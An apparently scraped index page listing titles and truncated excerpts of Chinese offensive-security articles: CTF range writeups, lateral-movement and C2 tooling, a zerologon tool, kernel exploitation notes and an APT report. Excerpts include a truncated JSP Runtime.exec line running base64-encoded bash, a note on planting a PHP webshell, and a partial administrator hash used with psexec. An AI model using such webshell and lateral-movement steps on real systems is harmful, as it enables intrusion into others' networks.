Fscan 二开记录

横向移动工具开发：wmiexec-Pro

可以看到，该项目的Todo，依旧想的是围绕注册表去进行修改，为此我们先把注册表传输文件放一边 WMIHACKER的文件传输部分

Ichunqiu云境 —— Endless(无间计划) Writeup

7. 后续复盘和作者交流过，gitlab不能直接拿下，但是最新的exp我没测试，有兴趣的大哥可以测试一下

Ichunqiu云境 —— Exchange Writeup

Crackmapexec 6.1.0 和一些杂项

基于Caddy实现的C2前置代理 - RedCaddy

1、首先的话，我们就不手撸一个http服务作为核心了（作者也没那本事），我们可以选中已有的开源http服务作为核心，这里选中了caddy作为核心，主要是配置挺方...

搞点什么：zerologon一键利用工具

ldap 过滤语句如下所示，我们这里取DA + EA组内，已经启用的用户，但是这里有个弊端，后续会讲searchFilter = f"(&(|(membe...

赏金猎人:IChunQiu云境-Spoofing Writeup

<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3N...

Ichunqiu云境 —— Tsclient Writeup

解出凭据，用administrator + psexec 139横向（外网没有开445）就能获取到 flag01 administrator 2caf35bb...

Ichunqiu云境 - Delegation Writeup

4. 使用弱口令登录进入后台，去到模板页面，编辑header.html，添加php一句话

Ichunqiu云境 - Delegation Writeup

0x1 Info图片0x2 ReconTarget external IP39.98.34.149Nmap results图片关注80端口的http服务，目录爆...

重磅发布：创宇安全智脑强势来袭

自2020 年来，全球疫情爆发，国际形势日益严峻，已有超40个国家背景的APT组织针对我国发起超5000次攻击行动，网络空间威胁重重，我国重点民生单位业务系统首...

​某内网域渗透靶场的writeup

本靶场是由"渗透攻击红队"所制作的一个靶场,看了看感觉效果十分不错,比较综合且有一定的思路扩展性.这里我们将会从别的一些角度来玩玩这个靶场,具体往下看。

洞态IAST Python探针内测版发布

洞态 IAST 首发 Python-agent 尝鲜，验证 Agent 针对路径穿越漏洞的检测能力。

vip业务权限漏洞挖掘入门姿势实战

现在很多网站都是通过卖VIP会员盈利的，为了让用户更有购买欲望，有的时候会把内容展示一小部分，然后隐藏绝大多部分，让你看完一点还想看就忍不住付钱了：），产品经理...

Windows Kernel Exploitation Notes(二)——HEVD Write-What-Where

•物理机OS：Windows 10 20H2 x64•物理机WinDbg：10.0.19041.685•虚拟机OS：Windows 7 SP1 x86(6.1....

Thinkphp5.0.0-5.0.18 RCE分析

漏洞代码位于：thinkphp/library/think/Request.php

Windows Kernel Exploitation Notes(一)——HEVD Stack Overflow

Windows Kernel Exploitation Notes(一)——HEVD Stack Overflow 1.本文一共4556个字 20张图 预计阅读...

Kimsuky APT组织使用新型的AppleSeed Android组件伪装成安全软件对韩特定目标进行攻击

kimsuky APT组织(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,...

Internet Explorer漏洞分析(五)——CVE-2016-0199

1.本文一共个字 张图 预计阅读时间分钟2.本文作者erfze 属于Gcow安全团队复眼小组 未经过许可禁止转载3.本篇文章是CVE-2016-0199漏洞的分...